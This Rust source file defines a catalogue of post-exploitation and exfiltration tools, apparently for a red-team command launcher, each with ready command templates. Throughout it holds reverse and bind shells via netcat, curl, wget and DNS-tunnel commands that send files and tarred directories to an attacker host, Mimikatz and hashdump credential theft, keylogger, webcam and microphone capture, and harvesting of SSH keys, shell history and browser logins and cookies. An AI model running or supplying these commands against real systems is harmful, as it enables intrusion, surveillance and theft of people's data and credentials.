use crate::tools::types::{Tool, Mode, InputKind, OutputFormat};

pub const TOOLS: &[Tool] = &[
    Tool {
        name: "rclone",
        binary: "rclone",
        description: "Versatile cloud storage sync tool repurposed for data exfiltration.",
        modes: &[
            Mode {
                name: "Cloud Upload",
                cmd_template: r#"rclone copy {local_path} {remote}:{bucket}/{path} > {output_file}"#,
                inputs: &[InputKind::Custom("Local Path", "local_path"), InputKind::Custom("Remote", "remote"), InputKind::Custom("Bucket", "bucket"), InputKind::Custom("Path", "path")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Sync",
                cmd_template: r#"rclone sync {local_path} {remote}:{bucket} --progress > {output_file}"#,
                inputs: &[InputKind::Custom("Local Path", "local_path"), InputKind::Custom("Remote", "remote"), InputKind::Custom("Bucket", "bucket")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Bandwidth Limit",
                cmd_template: r#"rclone copy {local_path} {remote}:{path} --bwlimit 500K > {output_file}"#,
                inputs: &[InputKind::Custom("Local Path", "local_path"), InputKind::Custom("Remote", "remote"), InputKind::Custom("Path", "path")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "File Filter",
                cmd_template: r#"rclone copy {local_path} {remote}:{path} --include '*.pdf' --include '*.doc*' > {output_file}"#,
                inputs: &[InputKind::Custom("Local Path", "local_path"), InputKind::Custom("Remote", "remote"), InputKind::Custom("Path", "path")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Encryption",
                cmd_template: r#"rclone copy {local_path} crypt-{remote}:{path} > {output_file}"#,
                inputs: &[InputKind::Custom("Local Path", "local_path"), InputKind::Custom("Remote", "remote"), InputKind::Custom("Path", "path")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "SFTP Transfer",
                cmd_template: r#"rclone copy {local_path} sftp:{remote_path} --sftp-host {host} --sftp-user {user} > {output_file}"#,
                inputs: &[InputKind::Custom("Local Path", "local_path"), InputKind::Custom("Remote Path", "remote_path"), InputKind::Custom("Host", "host"), InputKind::Username],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Size Filter",
                cmd_template: r#"rclone copy {local_path} {remote}:{path} --min-size 1M --max-size 100M > {output_file}"#,
                inputs: &[InputKind::Custom("Local Path", "local_path"), InputKind::Custom("Remote", "remote"), InputKind::Custom("Path", "path")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Dry Run",
                cmd_template: r#"rclone copy {local_path} {remote}:{path} --dry-run -v > {output_file}"#,
                inputs: &[InputKind::Custom("Local Path", "local_path"), InputKind::Custom("Remote", "remote"), InputKind::Custom("Path", "path")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Move Files",
                cmd_template: r#"rclone move {local_path} {remote}:{path} > {output_file}"#,
                inputs: &[InputKind::Custom("Local Path", "local_path"), InputKind::Custom("Remote", "remote"), InputKind::Custom("Path", "path")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Exfil",
                cmd_template: r#"rclone sync {sensitive_path} {remote}:{path} --include '*.{pdf,doc,docx,xls,xlsx,db,sql}' --bwlimit 1M --progress > {output_file}"#,
                inputs: &[InputKind::Custom("Sensitive Path", "sensitive_path"), InputKind::Custom("Remote", "remote"), InputKind::Custom("Path", "path")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "impacket-smbserver",
        binary: "smbserver.py",
        description: "Quick SMB share for file transfer without external infrastructure.",
        modes: &[
            Mode {
                name: "Basic Share",
                cmd_template: r#"smbserver.py -smb2support {share_name} {share_path} > {output_file}"#,
                inputs: &[InputKind::Custom("Share Name", "share_name"), InputKind::Custom("Share Path", "share_path")],
                output_format: OutputFormat::Lines,
                file_ext: "log",
            },
            Mode {
                name: "Auth Share",
                cmd_template: r#"smbserver.py -smb2support -username {user} -password {password} {name} {path} > {output_file}"#,
                inputs: &[InputKind::Username, InputKind::Password, InputKind::Custom("Name", "name"), InputKind::Custom("Path", "path")],
                output_format: OutputFormat::Lines,
                file_ext: "log",
            },
            Mode {
                name: "Download",
                cmd_template: r#"\\{lhost}\\{share}\\{file} copied to {local}"#,
                inputs: &[InputKind::Lhost, InputKind::Custom("Share", "share"), InputKind::File, InputKind::Custom("Local", "local")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Upload Share",
                cmd_template: r#"smbserver.py -smb2support -comment 'Upload' upload {path} > {output_file}"#,
                inputs: &[InputKind::Custom("Path", "path")],
                output_format: OutputFormat::Lines,
                file_ext: "log",
            },
            Mode {
                name: "Specific IP",
                cmd_template: r#"smbserver.py -smb2support -ip {ip} {name} {path} > {output_file}"#,
                inputs: &[InputKind::Ip, InputKind::Custom("Name", "name"), InputKind::Custom("Path", "path")],
                output_format: OutputFormat::Lines,
                file_ext: "log",
            },
            Mode {
                name: "Custom Port",
                cmd_template: r#"smbserver.py -smb2support -port 4455 {name} {path} > {output_file}"#,
                inputs: &[InputKind::Custom("Name", "name"), InputKind::Custom("Path", "path")],
                output_format: OutputFormat::Lines,
                file_ext: "log",
            },
            Mode {
                name: "Debug Mode",
                cmd_template: r#"smbserver.py -smb2support -debug {name} {path} > {output_file}"#,
                inputs: &[InputKind::Custom("Name", "name"), InputKind::Custom("Path", "path")],
                output_format: OutputFormat::Lines,
                file_ext: "log",
            },
            Mode {
                name: "No Auth",
                cmd_template: r#"smbserver.py -smb2support -no-auth {name} {path} > {output_file}"#,
                inputs: &[InputKind::Custom("Name", "name"), InputKind::Custom("Path", "path")],
                output_format: OutputFormat::Lines,
                file_ext: "log",
            },
            Mode {
                name: "Target Upload",
                cmd_template: r#"copy {file} \\{lhost}\\{share}\\ > {output_file}"#,
                inputs: &[InputKind::File, InputKind::Lhost, InputKind::Custom("Share", "share")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Transfer",
                cmd_template: r#"smbserver.py -smb2support -username admin -password admin -ip {ip} data /tmp/data > {output_file}"#,
                inputs: &[InputKind::Ip],
                output_format: OutputFormat::Lines,
                file_ext: "log",
            },
        ],
    },
    Tool {
        name: "netcat / ncat",
        binary: "nc",
        description: "Networking utility for file transfer, reverse shells, and port scanning.",
        modes: &[
            Mode {
                name: "File Receive",
                cmd_template: r#"nc -l -p {port} > {output_file}"#,
                inputs: &[InputKind::Ports],
                output_format: OutputFormat::Raw,
                file_ext: "raw",
            },
            Mode {
                name: "File Send",
                cmd_template: r#"nc {lhost} {port} < {file} > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Ports, InputKind::File],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "SSL Transfer",
                cmd_template: r#"ncat --ssl -l {port} --recv-only > {output_file}"#,
                inputs: &[InputKind::Ports],
                output_format: OutputFormat::Raw,
                file_ext: "raw",
            },
            Mode {
                name: "Reverse Shell",
                cmd_template: r#"nc -e /bin/sh {lhost} {lport} > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Bind Shell",
                cmd_template: r#"nc -l -p {port} -e /bin/sh > {output_file}"#,
                inputs: &[InputKind::Ports],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Port Scan",
                cmd_template: r#"nc -zv {target} {port_start}-{port_end} > {output_file}"#,
                inputs: &[InputKind::Target, InputKind::Custom("Port Start", "port_start"), InputKind::Custom("Port End", "port_end")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Banner Grab",
                cmd_template: r#"echo '' \| nc -v -w 1 {target} {port} > {output_file}"#,
                inputs: &[InputKind::Target, InputKind::Ports],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "HTTP Request",
                cmd_template: r#"printf 'GET / HTTP/1.0\r\n\r\n' \| nc {target} 80 > {output_file}"#,
                inputs: &[InputKind::Target],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "UDP Transfer",
                cmd_template: r#"nc -u -l -p {port} > {output_file}"#,
                inputs: &[InputKind::Ports],
                output_format: OutputFormat::Raw,
                file_ext: "raw",
            },
            Mode {
                name: "Directory Stream",
                cmd_template: r#"tar czf - {directory} \| nc {lhost} {port} > {output_file}"#,
                inputs: &[InputKind::Custom("Directory", "directory"), InputKind::Lhost, InputKind::Ports],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "Metasploit Post-Exploitation",
        binary: "meterpreter",
        description: "Data collection, system enumeration, and targeted actions.",
        modes: &[
            Mode {
                name: "File Search",
                cmd_template: r#"meterpreter > search -f *.pdf -d C:\\ > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Download File",
                cmd_template: r#"meterpreter > download {remote_file} {local_path} > {output_file}"#,
                inputs: &[InputKind::Custom("Remote File", "remote_file"), InputKind::Custom("Local Path", "local_path")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Upload File",
                cmd_template: r#"meterpreter > upload {local_file} {remote_path} > {output_file}"#,
                inputs: &[InputKind::Custom("Local File", "local_file"), InputKind::Custom("Remote Path", "remote_path")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Screenshot",
                cmd_template: r#"meterpreter > screenshot -p {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Raw,
                file_ext: "png",
            },
            Mode {
                name: "Keylogger",
                cmd_template: r#"meterpreter > keyscan_start > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Hash Dump",
                cmd_template: r#"meterpreter > hashdump > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Record Mic",
                cmd_template: r#"meterpreter > record_mic -d 60 -f {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Webcam Snap",
                cmd_template: r#"meterpreter > webcam_snap -p {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Loot Collect",
                cmd_template: r#"meterpreter > loot -t files > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Collection",
                cmd_template: r#"meterpreter > run post/windows/gather/enum_files; screenshot; keyscan_dump; hashdump > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "PowerShell Empire",
        binary: "empire",
        description: "Post-exploitation agent with pure PowerShell capabilities.",
        modes: &[
            Mode {
                name: "Agent List",
                cmd_template: r#"empire > agents > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Module Search",
                cmd_template: r#"empire > usemodule <TAB> > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Keylogger",
                cmd_template: r#"empire > usemodule powershell/collection/keylogger; set Agent {agent}; execute > {output_file}"#,
                inputs: &[InputKind::Custom("Agent", "agent")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Screenshot",
                cmd_template: r#"empire > usemodule powershell/collection/screenshot; set Agent {agent}; execute > {output_file}"#,
                inputs: &[InputKind::Custom("Agent", "agent")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Clipboard",
                cmd_template: r#"empire > usemodule powershell/collection/clipboard_monitor; set Agent {agent}; execute > {output_file}"#,
                inputs: &[InputKind::Custom("Agent", "agent")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "File Finder",
                cmd_template: r#"empire > usemodule powershell/situational_awareness/network/powerview/find_localadmin_access; execute > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Mimikatz",
                cmd_template: r#"empire > usemodule powershell/credentials/mimikatz/logonpasswords; set Agent {agent}; execute > {output_file}"#,
                inputs: &[InputKind::Custom("Agent", "agent")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Token Enum",
                cmd_template: r#"empire > usemodule powershell/credentials/tokens; set Agent {agent}; execute > {output_file}"#,
                inputs: &[InputKind::Custom("Agent", "agent")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "File Search",
                cmd_template: r#"empire > shell dir C:\\Users\\ /s \| findstr '.pdf' > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Operation",
                cmd_template: r#"empire > usemodule powershell/collection/keylogger; usemodule powershell/collection/screenshot; usemodule powershell/credentials/mimikatz/logonpasswords; execute > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "Unix Text Processing Toolkit",
        binary: "grep",
        description: "Core utilities for parsing logs and searching for sensitive data.",
        modes: &[
            Mode {
                name: "Credential Search",
                cmd_template: r#"grep -ri 'password\|passwd\|pwd' {directory} 2>/dev/null > {output_file}"#,
                inputs: &[InputKind::Custom("Directory", "directory")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Config Parse",
                cmd_template: r#"grep -E '^(user\|pass\|host\|port\|key)' {config_file} > {output_file}"#,
                inputs: &[InputKind::File],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Log Extract",
                cmd_template: r#"awk '/{pattern}/{print $0}' {log_file} > {output_file}"#,
                inputs: &[InputKind::Custom("Pattern", "pattern"), InputKind::Custom("Log File", "log_file")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "CSV Process",
                cmd_template: r#"awk -F',' '{print $1, $3}' {csv_file} > {output_file}"#,
                inputs: &[InputKind::Custom("Csv File", "csv_file")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Config Discovery",
                cmd_template: r#"find {directory} -type f \( -name '*.conf' -o -name '*.ini' -o -name '*.xml' \) > {output_file}"#,
                inputs: &[InputKind::Custom("Directory", "directory")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "DB Search",
                cmd_template: r#"find {directory} -name '*.db' -o -name '*.sql' -o -name '*.sqlite' > {output_file}"#,
                inputs: &[InputKind::Custom("Directory", "directory")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "History Collect",
                cmd_template: r#"cat /home/*/.bash_history /root/.bash_history 2>/dev/null > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "SSH Key Harvest",
                cmd_template: r#"find /home -name 'id_rsa' -o -name 'id_ed25519' 2>/dev/null > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Sensitive Pattern",
                cmd_template: r#"grep -r -l -i 'BEGIN OPENSSH PRIVATE KEY\|BEGIN RSA PRIVATE KEY\|AKIA' {path} > {output_file}"#,
                inputs: &[InputKind::Custom("Path", "path")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Data Sweep",
                cmd_template: r#"find {directory} -type f \( -name '*.pdf' -o -name '*.doc*' -o -name '*.xls*' \) -exec cp {} {staging}/ + > {output_file}"#,
                inputs: &[InputKind::Custom("Directory", "directory"), InputKind::Custom("Staging", "staging")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "curl / wget",
        binary: "curl",
        description: "HTTP clients for data exfiltration through HTTP/HTTPS.",
        modes: &[
            Mode {
                name: "File Upload",
                cmd_template: r#"curl -F 'file=@{file}' http://{lhost}:{port}/upload > {output_file}"#,
                inputs: &[InputKind::File, InputKind::Lhost, InputKind::Ports],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "PUT Upload",
                cmd_template: r#"curl -T {file} http://{lhost}:{port}/{path} > {output_file}"#,
                inputs: &[InputKind::File, InputKind::Lhost, InputKind::Ports, InputKind::Custom("Path", "path")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Data POST",
                cmd_template: r#"curl -X POST -d '{data}' http://{lhost}:{port}/receive > {output_file}"#,
                inputs: &[InputKind::Custom("Data", "data"), InputKind::Lhost, InputKind::Ports],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Base64 Transfer",
                cmd_template: r#"cat {file} \| base64 \| curl -X POST -d @- http://{lhost}:{port}/ > {output_file}"#,
                inputs: &[InputKind::File, InputKind::Lhost, InputKind::Ports],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "HTTPS Upload",
                cmd_template: r#"curl -k -F 'file=@{file}' https://{lhost}:{port}/upload > {output_file}"#,
                inputs: &[InputKind::File, InputKind::Lhost, InputKind::Ports],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "WGET Upload",
                cmd_template: r#"wget --post-file={file} http://{lhost}:{port}/receive > {output_file}"#,
                inputs: &[InputKind::File, InputKind::Lhost, InputKind::Ports],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Chunked Upload",
                cmd_template: r#"curl --limit-rate 100K -F 'file=@{file}' http://{lhost}:{port}/upload > {output_file}"#,
                inputs: &[InputKind::File, InputKind::Lhost, InputKind::Ports],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Custom Header",
                cmd_template: r#"curl -H 'X-Data: secret' -F 'file=@{file}' http://{lhost}:{port}/ > {output_file}"#,
                inputs: &[InputKind::File, InputKind::Lhost, InputKind::Ports],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Proxy Upload",
                cmd_template: r#"curl -x http://{proxy}:{port} -F 'file=@{file}' http://{lhost}/upload > {output_file}"#,
                inputs: &[InputKind::Custom("Proxy", "proxy"), InputKind::Ports, InputKind::File, InputKind::Lhost],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Pipeline",
                cmd_template: r#"tar czf - {directory} \| base64 \| curl -X POST -d @- http://{lhost}:{port}/exfil > {output_file}"#,
                inputs: &[InputKind::Custom("Directory", "directory"), InputKind::Lhost, InputKind::Ports],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "DNSExfiltrator",
        binary: "dns-exfiltrator.py",
        description: "Covert data exfiltration through DNS queries.",
        modes: &[
            Mode {
                name: "File DNS Exfil",
                cmd_template: r#"python3 dns-exfiltrator.py -f {file} -d {domain} -n {nameserver} > {output_file}"#,
                inputs: &[InputKind::File, InputKind::Domain, InputKind::Custom("Nameserver", "nameserver")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "String Exfil",
                cmd_template: r#"python3 dns-exfiltrator.py -s '{data}' -d {domain} -n {nameserver} > {output_file}"#,
                inputs: &[InputKind::Custom("Data", "data"), InputKind::Domain, InputKind::Custom("Nameserver", "nameserver")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Iodine Tunnel",
                cmd_template: r#"iodine -f -P {password} {nameserver} {domain} > {output_file}"#,
                inputs: &[InputKind::Password, InputKind::Custom("Nameserver", "nameserver"), InputKind::Domain],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Iodine Server",
                cmd_template: r#"iodined -f -P {password} -c {tun_ip} {domain} > {output_file}"#,
                inputs: &[InputKind::Password, InputKind::Custom("Tun Ip", "tun_ip"), InputKind::Domain],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Chunked Transfer",
                cmd_template: r#"python3 dns-exfiltrator.py -f {file} -d {domain} -c 50 > {output_file}"#,
                inputs: &[InputKind::File, InputKind::Domain],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Base32 Encoding",
                cmd_template: r#"python3 dns-exfiltrator.py -f {file} -d {domain} -b > {output_file}"#,
                inputs: &[InputKind::File, InputKind::Domain],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Reverse Tunnel",
                cmd_template: r#"iodine -r -P {password} {nameserver} {domain} > {output_file}"#,
                inputs: &[InputKind::Password, InputKind::Custom("Nameserver", "nameserver"), InputKind::Domain],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Throughput Test",
                cmd_template: r#"python3 dns-exfiltrator.py -f /dev/zero -s 10M -d {domain} > {output_file}"#,
                inputs: &[InputKind::Domain],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Encrypted Tunnel",
                cmd_template: r#"iodine -f -P {password} -T TXT {nameserver} {domain} > {output_file}"#,
                inputs: &[InputKind::Password, InputKind::Custom("Nameserver", "nameserver"), InputKind::Domain],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Exfil Chain",
                cmd_template: r#"cat {sensitive_file} \| gzip \| base64 \| python3 dns-exfiltrator.py -s - -d {domain} -n {ns} > {output_file}"#,
                inputs: &[InputKind::Custom("Sensitive File", "sensitive_file"), InputKind::Domain, InputKind::Custom("Ns", "ns")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "sqlite3",
        binary: "sqlite3",
        description: "Command-line interface for SQLite database extraction.",
        modes: &[
            Mode {
                name: "List Tables",
                cmd_template: r#"sqlite3 {database}.db '.tables' > {output_file}"#,
                inputs: &[InputKind::Custom("Database", "database")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Table Schema",
                cmd_template: r#"sqlite3 {database}.db '.schema {table}' > {output_file}"#,
                inputs: &[InputKind::Custom("Database", "database"), InputKind::Custom("Table", "table")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Data Dump",
                cmd_template: r#"sqlite3 {database}.db 'SELECT * FROM {table}' > {output_file}"#,
                inputs: &[InputKind::Custom("Database", "database"), InputKind::Custom("Table", "table")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Chrome Passwords",
                cmd_template: r#"sqlite3 'Login Data' 'SELECT origin_url, username_value FROM logins' > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Cookie Extract",
                cmd_template: r#"sqlite3 'Cookies' 'SELECT host_key, name, value FROM cookies' > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "CSV Export",
                cmd_template: r#"sqlite3 {database}.db '.mode csv' 'SELECT * FROM {table}' > {output_file}"#,
                inputs: &[InputKind::Custom("Database", "database"), InputKind::Custom("Table", "table")],
                output_format: OutputFormat::Csv,
                file_ext: "csv",
            },
            Mode {
                name: "Full Dump",
                cmd_template: r#"sqlite3 {database}.db '.dump' > {output_file}"#,
                inputs: &[InputKind::Custom("Database", "database")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Conditional Query",
                cmd_template: r#"sqlite3 {database}.db 'SELECT * FROM {table} WHERE {column} LIKE "%pass%"' > {output_file}"#,
                inputs: &[InputKind::Custom("Database", "database"), InputKind::Custom("Table", "table"), InputKind::Custom("Column", "column")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Find All DBs",
                cmd_template: r#"find /home -name '*.sqlite' -o -name '*.db' 2>/dev/null \| xargs -I {} sqlite3 {} '.tables' > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "CSV with Headers",
                cmd_template: r#"sqlite3 {database}.db '.mode csv' '.headers on' 'SELECT * FROM {table}' > {output_file}"#,
                inputs: &[InputKind::Custom("Database", "database"), InputKind::Custom("Table", "table")],
                output_format: OutputFormat::Csv,
                file_ext: "csv",
            },
        ],
    },
    Tool {
        name: "find + zip/tar",
        binary: "find",
        description: "File discovery and compression for efficient exfiltration.",
        modes: &[
            Mode {
                name: "Find PDFs",
                cmd_template: r#"find {directory} -type f -name '*.pdf' > {output_file}"#,
                inputs: &[InputKind::Custom("Directory", "directory")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Archive Directory",
                cmd_template: r#"tar czf {output_file} -C {directory} ."#,
                inputs: &[InputKind::Custom("Directory", "directory")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Selective Archive",
                cmd_template: r#"find {directory} -name '*.doc' -o -name '*.pdf' \| tar czf {output_file} -T -"#,
                inputs: &[InputKind::Custom("Directory", "directory")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Size Filter",
                cmd_template: r#"find {directory} -type f -size +1M -size -100M > {output_file}"#,
                inputs: &[InputKind::Custom("Directory", "directory")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Recent Files",
                cmd_template: r#"find {directory} -type f -mtime -7 > {output_file}"#,
                inputs: &[InputKind::Custom("Directory", "directory")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "SSH Key Collect",
                cmd_template: r#"find /home -type f \( -name 'id_rsa' -o -name '*.pem' \) 2>/dev/null > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Database Files",
                cmd_template: r#"find {directory} -type f \( -name '*.db' -o -name '*.sqlite' -o -name '*.sql' \) > {output_file}"#,
                inputs: &[InputKind::Custom("Directory", "directory")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Config Harvest",
                cmd_template: r#"find {directory} -type f \( -name '*.conf' -o -name '*.config' -o -name '*.ini' -o -name '*.xml' -o -name '*.env' \) > {output_file}"#,
                inputs: &[InputKind::Custom("Directory", "directory")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Exclude Archive",
                cmd_template: r#"tar czf {output_file} --exclude='node_modules' --exclude='.git' {directory}"#,
                inputs: &[InputKind::Custom("Directory", "directory")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Full Collection",
                cmd_template: r#"find {directory} -type f \( -name '*.pdf' -o -name '*.doc*' -o -name '*.xls*' -o -name '*.db' \) -exec tar czf {output_file} {} +"#,
                inputs: &[InputKind::Custom("Directory", "directory")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
        ],
    },
];
